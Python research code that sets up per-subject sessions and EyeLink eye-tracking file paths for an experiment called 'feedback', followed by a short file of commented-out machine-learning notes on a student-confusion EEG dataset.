{'ID' : 6, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-19_s1_r6.edf' ),
},
{'ID' : 7, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-19_s1_r7.edf' ),
},
{'ID' : 8, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-19_s1_r8.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-20':
# subject information
initials = 'sub-20'
firstName = 'sub-20'
standardFSID = 'sub-20_220617'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'feedback', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'feedback' + presentSubject.initials
sj_session1 = []
if s == 1:
sessionDate = datetime.date(2017, 6, 22)
sj_session1 = 'sub-20_220617'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-20_s1_r1.edf' ),
},
{'ID' : 2, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-20_s1_r2.edf' ),
},
{'ID' : 3, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-20_s1_r3.edf' ),
},
{'ID' : 4, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-20_s1_r4.edf' ),
},
{'ID' : 5, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-20_s1_r5.edf' ),
},
{'ID' : 6, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-20_s1_r6.edf' ),
},
{'ID' : 7, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-20_s1_r7.edf' ),
},
{'ID' : 8, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-20_s1_r8.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-21':
# subject information
initials = 'sub-21'
firstName = 'sub-21'
standardFSID = 'sub-21_220617'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'feedback', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'feedback' + presentSubject.initials
sj_session1 = []
if s == 1:
sessionDate = datetime.date(2017, 6, 29)
sj_session1 = 'sub-21_290617'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-21_s1_r1.edf' ),
},
{'ID' : 2, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-21_s1_r2.edf' ),
},
{'ID' : 3, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-21_s1_r3.edf' ),
},
{'ID' : 4, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-21_s1_r4.edf' ),
},
{'ID' : 5, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-21_s1_r5.edf' ),
},
{'ID' : 6, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-21_s1_r6.edf' ),
},
{'ID' : 7, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-21_s1_r7.edf' ),
},
{'ID' : 8, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-21_s1_r8.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-05':
# subject information
initials = 'sub-05'
firstName = 'sub-05'
standardFSID = 'sub-05_180717'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'feedback', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'feedback' + presentSubject.initials
sj_session1 = []
if s == 1:
sessionDate = datetime.date(2017, 7, 18)
sj_session1 = 'sub-05_180717'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-05_s1_r1.edf' ),
},
{'ID' : 2, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-05_s1_r2.edf' ),
},
{'ID' : 3, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-05_s1_r3.edf' ),
},
{'ID' : 4, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-05_s1_r4.edf' ),
},
{'ID' : 5, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-05_s1_r5.edf' ),
},
{'ID' : 6, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-05_s1_r6.edf' ),
},
{'ID' : 7, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-05_s1_r7.edf' ),
},
{'ID' : 8, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-05_s1_r8.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-22':
# subject information
initials = 'sub-22'
firstName = 'sub-22'
standardFSID = 'sub-22_220611'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'feedback', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'feedback' + presentSubject.initials
sj_session1 = []
if s == 1:
sessionDate = datetime.date(2017, 6, 22)
sj_session1 = 'sub-22_220617'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-22_s1_r1.edf' ),
},
{'ID' : 2, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-22_s1_r2.edf' ),
},
{'ID' : 3, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-22_s1_r3.edf' ),
},
{'ID' : 4, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-22_s1_r4.edf' ),
},
{'ID' : 5, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-22_s1_r5.edf' ),
},
{'ID' : 6, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-22_s1_r6.edf' ),
},
{'ID' : 7, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-22_s1_r7.edf' ),
},
{'ID' : 8, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-22_s1_r8.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-23':
# subject information
initials = 'sub-23'
firstName = 'sub-23'
standardFSID = 'sub-23_010100'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'feedback', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'feedback' + presentSubject.initials
sj_session1 = []
if s == 1:
sessionDate = datetime.date(2017, 10, 11)
sj_session1 = 'sub-23_111017'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-23_s1_r1.edf' ),
},
{'ID' : 2, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-23_s1_r2.edf' ),
},
{'ID' : 3, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-23_s1_r3.edf' ),
},
{'ID' : 4, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-23_s1_r4.edf' ),
},
{'ID' : 5, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-23_s1_r5.edf' ),
},
{'ID' : 6, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-23_s1_r6.edf' ),
},
{'ID' : 7, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-23_s1_r7.edf' ),
},
{'ID' : 8, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-23_s1_r8.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-24':
# subject information
initials = 'sub-24'
firstName = 'sub-24'
standardFSID = 'sub-24_180711'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'feedback', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'feedback' + presentSubject.initials
sj_session1 = []
if s == 1:
sessionDate = datetime.date(2017, 7, 18)
sj_session1 = 'sub-24_180717'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-24_s1_r1.edf' ),
},
{'ID' : 2, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-24_s1_r2.edf' ),
},
{'ID' : 3, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-24_s1_r3.edf' ),
},
{'ID' : 4, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-24_s1_r4.edf' ),
},
{'ID' : 5, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-24_s1_r5.edf' ),
},
{'ID' : 6, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-24_s1_r6.edf' ),
},
{'ID' : 7, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-24_s1_r7.edf' ),
},
{'ID' : 8, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-24_s1_r8.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-09':
# subject information
initials = 'sub-09'
firstName = 'sub-09'
standardFSID = 'sub-09_250711'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'feedback', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'feedback' + presentSubject.initials
sj_session1 = []
if s == 1:
sessionDate = datetime.date(2017, 6, 19)
sj_session1 = 'sub-09_190617'
# if s == 2:
# sessionDate = datetime.date(2016, 2, 8)
# sj_session2 = 'sub-09_080216'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-09_s1_r1.edf' ),
},
{'ID' : 2, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-09_s1_r2.edf' ),
},
{'ID' : 3, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-09_s1_r3.edf' ),
},
{'ID' : 4, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-09_s1_r4.edf' ),
},
{'ID' : 5, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-09_s1_r5.edf' ),
},
{'ID' : 6, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-09_s1_r6.edf' ),
},
{'ID' : 7, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-09_s1_r7.edf' ),
},
{'ID' : 8, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-09_s1_r8.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-25':
# subject information
initials = 'sub-25'
firstName = 'sub-25'
standardFSID = 'sub-25_220617'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'feedback', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'feedback' + presentSubject.initials
sj_session1 = []
if s == 1:
sessionDate = datetime.date(2017, 6, 22)
sj_session1 = 'sub-25_220617'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-25_s1_r1.edf' ),
},
{'ID' : 2, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-25_s1_r2.edf' ),
},
{'ID' : 3, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-25_s1_r3.edf' ),
},
{'ID' : 4, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-25_s1_r4.edf' ),
},
{'ID' : 5, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-25_s1_r5.edf' ),
},
{'ID' : 6, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-25_s1_r6.edf' ),
},
{'ID' : 7, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-25_s1_r7.edf' ),
},
{'ID' : 8, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-25_s1_r8.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-26':
# subject information
initials = 'sub-26'
firstName = 'sub-26'
standardFSID = 'sub-26_220617'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'feedback', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'feedback' + presentSubject.initials
sj_session1 = []
if s == 1:
sessionDate = datetime.date(2017, 6, 22)
sj_session1 = 'sub-26_220617'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-26_s1_r1.edf' ),
},
{'ID' : 2, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-26_s1_r2.edf' ),
},
{'ID' : 3, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-26_s1_r3.edf' ),
},
{'ID' : 4, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-26_s1_r4.edf' ),
},
{'ID' : 5, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-26_s1_r5.edf' ),
},
{'ID' : 6, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-26_s1_r6.edf' ),
},
{'ID' : 7, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-26_s1_r7.edf' ),
},
{'ID' : 8, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-26_s1_r8.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
if which_subject == 'sub-27':
# subject information
initials = 'sub-27'
firstName = 'sub-27'
standardFSID = 'sub-27_010100'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'feedback', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'feedback' + presentSubject.initials
sj_session1 = []
if s == 1:
sessionDate = datetime.date(2017, 10, 11)
sj_session1 = 'sub-27_111017'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-27_s1_r1.edf' ),
},
{'ID' : 2, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-27_s1_r2.edf' ),
},
{'ID' : 3, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-27_s1_r3.edf' ),
},
{'ID' : 4, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-27_s1_r4.edf' ),
},
{'ID' : 5, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-27_s1_r5.edf' ),
},
{'ID' : 6, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-27_s1_r6.edf' ),
},
{'ID' : 7, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-27_s1_r7.edf' ),
},
{'ID' : 8, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-27_s1_r8.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
####################################################################################################################################################################################
if which_subject == 'sub-28':
# subject information
initials = 'sub-28'
firstName = 'sub-28'
standardFSID = 'sub-28_010100'
birthdate = datetime.date( 1900, 01, 01 )
labelFolderOfPreference = '2014_custom'
presentSubject = Subject( initials, firstName, birthdate, standardFSID, labelFolderOfPreference )
presentProject = Project( 'feedback', subject = presentSubject, base_dir = os.path.join(this_project_folder, 'data') )
sessionID = 'feedback' + presentSubject.initials
sj_session1 = []
if s == 1:
sessionDate = datetime.date(2017, 7, 19)
sj_session1 = 'sub-28_190717'
presentSession = VisualSession(sessionID, sessionDate, presentProject, presentSubject)
try:
os.mkdir(os.path.join(this_project_folder, 'data', initials))
except OSError:
presentSession.logger.debug('output folders already exist')
# ----------------------
# Decision tasks: -
# ----------------------
if s == 1:
runDecisionArray = [
# Measure IRF:
{'ID' : 1, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-28_s1_r1.edf' ),
},
{'ID' : 2, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-28_s1_r2.edf' ),
},
{'ID' : 3, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-28_s1_r3.edf' ),
},
{'ID' : 4, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-28_s1_r4.edf' ),
},
{'ID' : 5, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-28_s1_r5.edf' ),
},
{'ID' : 6, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-28_s1_r6.edf' ),
},
{'ID' : 7, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-28_s1_r7.edf' ),
},
{'ID' : 8, 'scanType': 'main_task', 'condition': 'task', 'session' : 1,
'eyeLinkFilePath': os.path.join(this_raw_folder, initials, sj_session1, 'eye', 'sub-28_s1_r8.edf' ),
},
]
# ----------------------
# Initialise session -
# ----------------------
runWholeSession( runDecisionArray, presentSession )
########################################################################################################################################################################################################
|
StarcoderdataPython
|
119269
|
<filename>confused_stud/trash.py
# NOTE this is what they did for the students dataset
# Some nonsense to help you select features that will best predict the label
# y=pd.get_dummies(df['user-definedlabeln'])
# mi_score=mutual_info_classif(df.drop('user-definedlabeln',axis=1),df['user-definedlabeln'])
# mi_score=pd.Series(mi_score,index=df.drop('user-definedlabeln',axis=1).columns)
# mi_score=(mi_score*100).sort_values(ascending=False)
# print(mi_score)
# Selects the top 14 features
# print(mi_score.head(14).index)
# top_fea=['VideoID', 'Attention', 'Alpha2', 'Delta', 'Gamma1', 'Theta', 'Beta1',
# 'Alpha1', 'Mediation', 'Gamma2', 'SubjectID', 'Beta2', 'Raw', 'age']
# Set to zero mean and unit variance (i.e. divide by variance). This assumes thin tails.
# https://scikit-learn.org/stable/modules/generated/sklearn.preprocessing.StandardScaler.html
# df_sc=StandardScaler().fit_transform(df[top_fea])
# TODO pytorch this shit
# import tensorflow as tf
# from tensorflow import keras
# from tensorflow.keras import callbacks,layers
# TODO train/test split
# from sklearn.model_selection import train_test_split
# Xtr,xte,Ytr,yte=train_test_split(df_sc,y,random_state=108,test_size=0.27)
# xtr,xval,ytr,yval=train_test_split(Xtr,Ytr,random_state=108,test_size=0.27)
# TODO this is their model, probably too big for what we want to run, but I could be wrong!
# I'm willing to bet their network is overfitted
# Model-Building step, stacking the hidden layers
